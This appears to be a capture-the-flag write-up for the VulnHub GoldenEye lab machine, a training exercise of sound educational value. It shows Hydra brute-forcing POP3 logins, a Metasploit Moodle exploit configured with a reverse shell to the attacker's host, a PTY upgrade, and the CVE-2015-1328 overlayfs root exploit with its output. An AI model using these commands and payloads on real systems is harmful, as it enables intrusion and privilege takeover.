Project: GoldenEye

Project URL: https://www.vulnhub.com/entry/goldeneye-1,240/

Name: GoldenEye: 1
Date release: 4 May 2018
Author: creosote
Series: GoldenEye


Description

I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.

I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.
Changelog: Beta 2018-05-02; v1 2018-05-04

Information gathering

Finding the target's IP address

nmap -sP 10.0.0.0/24

-sP is the legacy spelling of -sn (a ping sweep with no port scan). Output:

┌──(root㉿kali)-[~]
└─# nmap -sP 10.0.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 09:58 CST
Nmap scan report for OpenWrt.lan (10.0.0.1)
Host is up (0.00073s latency).
MAC Address: 00:15:5D:64:C0:01 (Microsoft)
Nmap scan report for PC-A.lan (10.0.0.2)
Host is up (0.00045s latency).
MAC Address: 00:15:5D:64:C0:00 (Microsoft)
Nmap scan report for ubuntu.lan (10.0.0.101)
Host is up (0.00044s latency).
MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap scan report for kali.lan (10.0.0.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds

The target is the host with the VMware MAC prefix (00:0C:29): 10.0.0.101. The two 00:15:5D hosts are Hyper-V machines on the same segment.

Scanning the target's ports

┌──(root㉿kali)-[~]
└─# nmap 10.0.0.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 13:36 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.00055s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
MAC Address: 00:0C:29:75:99:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Ports 25 (smtp) and 80 (http) are open. Note that a plain nmap run only covers the 1000 most common TCP ports, which matters later.

Information so far

ip:10.0.0.101
port:25,80

Visiting port 80

[screenshot: the GoldenEye landing page on port 80]

The page reveals the path /sev-home/.

Requesting it triggers a browser authentication pop-up: the directory is protected by HTTP basic authentication.

The home page source includes a JavaScript file that looks odd:

var data = [
{
GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
}
];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
var currentElementId = allElements[j].id;
var currentElementIdContent = data[0][currentElementId];
var element = document.getElementById(currentElementId);
var devTypeText = currentElementIdContent;


var i = 0, isTag, text;
(function type() {
text = devTypeText.slice(0, ++i);
if (text === devTypeText) return;
element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
var char = text.slice(-1);
if (char === "<") isTag = true;
if (char === ">") isTag = false;
if (isTag) return type();
setTimeout(type, 60);
})();
}


Extracting the useful information

Known information
ip: 10.0.0.101
ports: 25, 80
login page: /sev-home/
password: &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
The password is obviously HTML entity encoded (decimal numeric character references, one per letter).
Decoded: InvincibleHack3r

password: InvincibleHack3r
name1 = Boris
name2 = Natalya

Try the basic-auth prompt with each name and the password.

The combination name=boris, password=InvincibleHack3r succeeds.

[screenshot: /sev-home/ after logging in as boris]

GoldenEye is a top-secret Soviet orbital weapons project. Since you have access, you must hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO).

Please email a qualified GNO supervisor to receive the online GoldenEye Operator Training and become an administrator of the GoldenEye system.

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port.

So there is a POP3 service on a high, non-default port, which the default top-1000 scan missed.

Scanning the full port range

┌──(root㉿kali)-[~/100project/001]
└─# nmap -p- 10.0.0.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:37 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.00089s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
MAC Address: 00:0C:29:75:99:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds

Ports 55006 and 55007 are open. Next, service and version detection on just those two ports:

┌──(root㉿kali)-[~/100project/001]
└─# nmap -p55006,55007 10.0.0.101 -sS -sV -A -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:39 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING UIDL USER SASL(PLAIN) CAPA RESP-CODES TOP
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL SASL(PLAIN) STLS RESP-CODES AUTH-RESP-CODE CAPA USER TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:75:99:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 01.lan (10.0.0.101)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds

This confirms 55006 is POP3 over TLS (implicit TLS, with a self-signed certificate for "localhost") and 55007 is plain POP3 that also offers STLS; both are Dovecot. Neither advertises anything stronger than SASL PLAIN, so credentials cross the wire in clear text on 55007.

Next, brute-force the POP3 service with Hydra. The plaintext port 55007 is the easier target; 55006 would need hydra's -S option for TLS.

Hydra against POP3

# Brute-force with the two usernames collected above. name.txt holds both capitalisations of each name and both succeed, so the server matches usernames case-insensitively: these are two accounts, not four. The password list used is not shown.
┌──(root㉿kali)-[~/100project/001]
└─# cat success.txt
# Hydra v9.3 run at 2022-08-22 16:50:19 on 10.0.0.101 pop3 (hydra -L name.txt -P password.txt -o success.txt -t 64 -s 55007 10.0.0.101 pop3)
[55007][pop3] host: 10.0.0.101 login: boris password: secret1!
[55007][pop3] host: 10.0.0.101 login: Boris password: secret1!
[55007][pop3] host: 10.0.0.101 login: natalya password: bird
[55007][pop3] host: 10.0.0.101 login: Natalya password: bird
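The nc sessions below drive the POP3 protocol by hand. As an added example (not part of the original writeup), here is a small client that does the same thing programmatically: it logs in, walks LIST, fetches every message with RETR, and undoes the dot-stuffing that a real server applies to lines beginning with "." (RFC 1939). It also includes a constructed stand-in server so the client can be exercised offline; the hostnames, ports and credentials in the usage comment are the ones found on this box, and the TLS helper assumes the self-signed certificate seen in the nmap output.

```python
import socket
import ssl
import sys


class Pop3Session:
    """Tiny POP3 client over anything with sendall()/recv(): a real socket or the scripted server below."""

    def __init__(self, sock):
        self.sock, self.buf = sock, b""
        self.greeting = self._readline()  # "+OK GoldenEye POP3 Electronic-Mail System" on the box

    def _readline(self):
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\r\n")
        return line.decode("utf-8", "replace")

    def cmd(self, line):
        """Send one command, return its status line, raise on -ERR (e.g. a wrong password)."""
        self.sock.sendall((line + "\r\n").encode())
        status = self._readline()
        if not status.startswith("+OK"):
            raise RuntimeError(f"{line.split()[0]} rejected: {status}")
        return status

    def multiline(self, line):
        """Send a command whose reply runs to a lone '.', undoing dot-stuffing (RFC 1939, section 3)."""
        self.cmd(line)
        lines = []
        while (item := self._readline()) != ".":
            lines.append(item[1:] if item.startswith(".") else item)
        return lines

    def dump_mailbox(self, user, password):
        """Log in and return {message number: raw message text}, then QUIT cleanly."""
        self.cmd(f"USER {user}")
        self.cmd(f"PASS {password}")
        numbers = [int(entry.split()[0]) for entry in self.multiline("LIST")]
        mails = {n: "\n".join(self.multiline(f"RETR {n}")) for n in numbers}
        self.cmd("QUIT")
        return mails


def connect(host, port, tls=False):
    """TCP, or implicit TLS as on 55006. The box's certificate is self-signed for 'localhost', so
    verification is switched off here; only do that for a host whose certificate you already recorded."""
    sock = socket.create_connection((host, port), timeout=10)
    if tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    return sock


class ScriptedPop3Server:
    """Constructed stand-in for the Dovecot daemon on the box, so the client can be exercised offline."""

    def __init__(self, password, messages):
        self.password, self.messages = password, messages
        self.out = b"+OK GoldenEye POP3 Electronic-Mail System\r\n"

    def sendall(self, data):
        verb, _, arg = data.decode().strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            reply = "+OK"
        elif verb == "PASS":
            reply = "+OK Logged in." if arg == self.password else "-ERR [AUTH] Authentication failed."
        elif verb == "LIST":
            body = "".join(f"{i} {len(m)}\r\n" for i, m in enumerate(self.messages, 1))
            reply = f"+OK {len(self.messages)} messages:\r\n{body}."
        elif verb == "RETR":  # byte-stuff lines that start with '.', exactly as a real server must
            lines = self.messages[int(arg) - 1].split("\n")
            reply = "+OK octets\r\n" + "\r\n".join("." + l if l.startswith(".") else l for l in lines) + "\r\n."
        elif verb == "QUIT":
            reply = "+OK Logging out."
        else:
            reply = "-ERR Unknown command."
        self.out += (reply + "\r\n").encode()

    def recv(self, n):
        chunk, self.out = self.out[:n], self.out[n:]
        return chunk


if __name__ == "__main__":
    # usage: python pop3dump.py 10.0.0.101 55007 boris 'secret1!'   (append --tls for port 55006)
    host, port, user, password = sys.argv[1:5]
    session = Pop3Session(connect(host, int(port), "--tls" in sys.argv))
    for num, text in session.dump_mailbox(user, password).items():
        print(f"===== message {num} =====\n{text}\n")
```

For real engagements the standard library's poplib does the same job; the hand-rolled version is here to make the dot-stuffing and the +OK/-ERR handling visible, which is exactly what you are reading by eye in the nc transcripts.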

Reading mail over POP3 with nc

boris's mailbox

┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user Boris # username
+OK
pass secret1! # password
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1 # fetch message 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!

.
retr 3
+OK 921 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.


natalya's mailbox

┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user Natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


Information from the mail:
url: severnaya-station.com/gnocertdir
username: xenia
password: RCP90rulez!

Map the hostname to the target IP in /etc/hosts, as the mail instructs

[screenshot: /etc/hosts entry mapping 10.0.0.101 to severnaya-station.com]

Visit http://severnaya-station.com/gnocertdir

[screenshot: the /gnocertdir front page]

This is Moodle, a PHP learning-management system.

[screenshot: the Moodle site after logging in as xenia]

[screenshot: a message showing an email address for Dr Doak]

Logged in as xenia, a message reveals another account through its email address: the username doak.

Run Hydra against POP3 again with this username.

The password is goat.

Read doak's mailbox with nc

┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

This yields the Moodle credentials dr_doak:4England!

Log into Moodle as dr_doak.

A file in this account's private files stands out:

[screenshot: dr_doak's private files in Moodle]

[screenshot: the file's contents]

It points to the URL /dir007key/for-007.jpg.

Download the image and inspect its metadata

┌──(root㉿kali)-[~/100project/001]
└─# wget http://severnaya-station.com/dir007key/for-007.jpg
--2022-08-23 15:38:48-- http://severnaya-station.com/dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 10.0.0.101
Connecting to severnaya-station.com (severnaya-station.com)|10.0.0.101|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: 'for-007.jpg'

for-007.jpg 100%[=================================================>] 14.55K --.-KB/s in 0s

2022-08-23 15:38:48 (111 MB/s) - 'for-007.jpg' saved [14896/14896]

┌──(root㉿kali)-[~/100project/001]
└─# exiftool for-007.jpg
ExifTool Version Number : 12.44
File Name : for-007.jpg
Directory : .
File Size : 15 kB
File Modification Date/Time : 2018:04:25 08:40:02+08:00
File Access Date/Time : 2022:08:23 15:39:33+08:00
File Inode Change Date/Time : 2022:08:23 15:38:48+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : eFdpbnRlcjE5OTV4IQ==
Make : GoldenEye
Resolution Unit : inches
Software : linux
Artist : For James
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
User Comment : For 007
Flashpix Version : 0100
Image Width : 313
Image Height : 212
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 313x212
Megapixels : 0.066

The Image Description tag looks unusual: the trailing == is the padding you see at the end of base64 strings, so try decoding it as base64.

echo eFdpbnRlcjE5OTV4IQ== | base64 -d

This gives xWinter1995x!
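Two secrets on this box were hidden behind simple encodings: the HTML-entity password in the JavaScript comment, and the base64 string in the EXIF Image Description above. As an added example (not code from the original writeup), here is a small decoder that recognises both forms strictly and refuses false positives; the sample inputs are copies of the two strings found on the box, and the function names are my own.

```python
import base64
import binascii
import html
import re
import sys

# Constructed copies of the two encoded strings this box hides: one in a JavaScript comment,
# one in the EXIF Image Description of for-007.jpg.
HTML_ENTITY_SAMPLE = ("&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
                      "&#72;&#97;&#99;&#107;&#51;&#114;")
EXIF_SAMPLE = "eFdpbnRlcjE5OTV4IQ=="

# A string made entirely of character references: decimal (&#73;), hex (&#x49;) or named (&amp;).
ENTITY_RE = re.compile(r"^(?:&#(?:\d+|[xX][0-9a-fA-F]+);|&[A-Za-z][A-Za-z0-9]*;)+$")
# Base64 alphabet with at most two trailing '=' pad characters; the length check is done separately.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_html_entities(s):
    """Return the decoded text if s consists only of HTML character references, else None."""
    s = s.strip()
    return html.unescape(s) if ENTITY_RE.match(s) else None


def decode_base64(s):
    """Strict base64 decode to UTF-8 text; None if alphabet, length, padding or the bytes do not fit."""
    s = s.strip()
    if len(s) % 4 or not B64_RE.match(s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_suspicious(s):
    """Try each decoder in turn and report (encoding, plaintext); (None, s) if nothing matched."""
    for name, decoder in (("html-entities", decode_html_entities), ("base64", decode_base64)):
        out = decoder(s)
        if out is not None and out != s:
            return name, out
    return None, s


if __name__ == "__main__":
    # usage: python decode.py <string>...   (with no arguments the two samples from the box are decoded)
    for value in sys.argv[1:] or (HTML_ENTITY_SAMPLE, EXIF_SAMPLE):
        encoding, plain = decode_suspicious(value)
        print(f"{encoding or 'unrecognised'}: {value!r} -> {plain!r}")
```

The base64 check is a heuristic: any four-letter word is valid base64 syntactically, so the decoder also insists that the result is valid UTF-8, which is what rejects strings such as "goat" or "bird". Treat an unexpected hit as a lead to verify, not as proof.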

Log into Moodle as admin with this password.

Login succeeds.

[screenshot: the Moodle admin dashboard]

Summary of gathered information

ip: 10.0.0.101
host: severnaya-station.com
ports: 25, 80, 55006, 55007

application: Moodle 2.2.3

Credentials
pop3 (10.0.0.101:55007)
boris:secret1!
natalya:bird
doak:goat

moodle (severnaya-station.com/gnocertdir)
xenia:RCP90rulez!
dr_doak:4England!
admin:xWinter1995x!

Exploitation

The application is Moodle 2.2.3.

Searching for "moodle 2.2.3 exploit"

turns up CVE-2013-3630 on Exploit-DB: an authenticated administrator can set the path of the aspell binary used by the TinyMCE spellchecker, and Moodle then executes that path, giving command execution as the web server user.

Exploit it with Metasploit

Search for the module
┌──(root㉿kali)-[~]
└─# msfconsole



=[ metasploit v6.2.11-dev ]
+ -- --=[ 2233 exploits - 1179 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services

msf6 > search moodle

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_admin_shell_upload 2019-04-28 excellent Yes Moodle Admin Shell Upload
1 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
2 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution
3 exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce 2020-07-20 good Yes Moodle Teacher Enrollment Privilege Escalation to RCE


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce

Or search by CVE:

msf6 > search cve 2013-3630

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
1 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/moodle_spelling_path_rce
Use the module
msfconsole                                            --- start the Metasploit console
search cve 2013-3630                                  --- list the modules for this CVE
use exploit/multi/http/moodle_spelling_binary_rce     --- index 0 of that search; using the full name avoids picking the wrong module ("use 0" after "search moodle" would select moodle_admin_shell_upload)
set username admin                                    --- Moodle administrator account
set password xWinter1995x!
set rhosts severnaya-station.com                      --- target, resolved through /etc/hosts
set targeturi /gnocertdir                             --- the Moodle install path (the module defaults to /moodle/)
set payload cmd/unix/reverse
set lhost 10.0.0.3                                    --- attacker IP the reverse shell connects back to
run
msf6 > use 0
msf6 exploit(multi/http/moodle_spelling_binary_rce) > show options

Module options (exploit/multi/http/moodle_spelling_binary_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using
-Metasploit
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersonate
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /moodle/ yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic


msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x!
password => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 10.0.0.3
lhost => 10.0.0.3
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run

[*] Started reverse TCP double handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Exploit completed, but no session was created.

The module ran to completion but no session came back.

Reading the module source explains why: it only rewrites the path of the aspell binary, and Moodle only executes that binary when the TinyMCE spell engine is set to PSpellShell. On this install the engine is still the default, so the planted command is never invoked.

[screenshot: the module source noting the PSpellShell requirement]

Log into http://severnaya-station.com/gnocertdir as admin, go to Settings -> Site administration -> Plugins -> Text editors -> TinyMCE HTML editor, change Spell engine to PSpellShell, save, and run the module again:

msf6 exploit(multi/http/moodle_spelling_binary_rce) > run

[*] Started reverse TCP double handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7YPpFMOnfF8gG8B3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "7YPpFMOnfF8gG8B3\r\n"
[*] Matching...
[*] B is input...
whoami[*] Command shell session 2 opened (10.0.0.3:4444 -> 10.0.0.101:47575) at 2022-08-26 11:16:45 +0800


www-data

The shell that comes back is a bare command shell with no TTY (no job control, no prompt, no interactive programs), so upgrade it.

Check whether Python is installed:

whereis python
python: /usr/bin/python3.4m /usr/bin/python /usr/bin/python3.4 /usr/bin/python2.7 /etc/python /etc/python3.4 /etc/python2.7 /usr/lib/python3.4 /usr/lib/python2.7 /usr/bin/X11/python3.4m /usr/bin/X11/python /usr/bin/X11/python3.4 /usr/bin/X11/python2.7 /usr/local/lib/python3.4 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz

Spawn a TTY with Python:

python -c "import pty;pty.spawn('/bin/bash')"

Check the kernel version:

python -c "import pty;pty.spawn('/bin/bash')"
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /tmp
cd /tmp
www-data@01:/tmp$ uname -a
uname -a
Linux 01 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@01:/tmp$

Privilege escalation

The kernel is 3.13.0-32-generic, an Ubuntu 14.04 kernel built in July 2014.

Searching for a 3.13.0 privilege escalation

finds CVE-2015-1328 on Exploit-DB (EDB-ID 37292): overlayfs mounted inside a user namespace did not check permissions correctly in the upper directory, letting an unprivileged user create files owned by root, on Ubuntu kernels from 12.04 through 15.04 before the June 2015 fix.

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24

The header shows the exploit is built with gcc, and the source also shells out to gcc at run time to compile the shared library it drops into /etc/ld.so.preload.

Check for gcc on the target:

www-data@01:/tmp$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

Not installed. Check for cc:

www-data@01:/tmp$ cc
cc
clang: error: no input files
www-data@01:/tmp$

The error is "no input files", so a compiler is present: cc resolves to clang.

Edit the exploit so that the gcc invocation inside it (the system() call that builds the preload library) uses cc instead; then compile the exploit itself with cc as well.

[screenshot: the edited exploit with gcc replaced by cc]

www-data@01:/tmp$ cc 1.c -o exp
cc 1.c -o exp
1.c:62:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
1.c:74:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
1.c:79:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
1.c:85:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
1.c:95:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@01:/tmp$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#

Root obtained. The clang warnings are harmless here: they flag missing prototypes for unshare, clone and waitpid, not errors.

Now find the flag:

# find / -name "*flag*"
find / -name "*flag*"
/usr/lib/llvm-3.4/build/autoconf/m4/cxx_flag_check.m4
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/share/help-langpack/en_GB/evolution/mail-follow-up-flag.page
/usr/share/help-langpack/en_GB/gnome-mines/flags.page
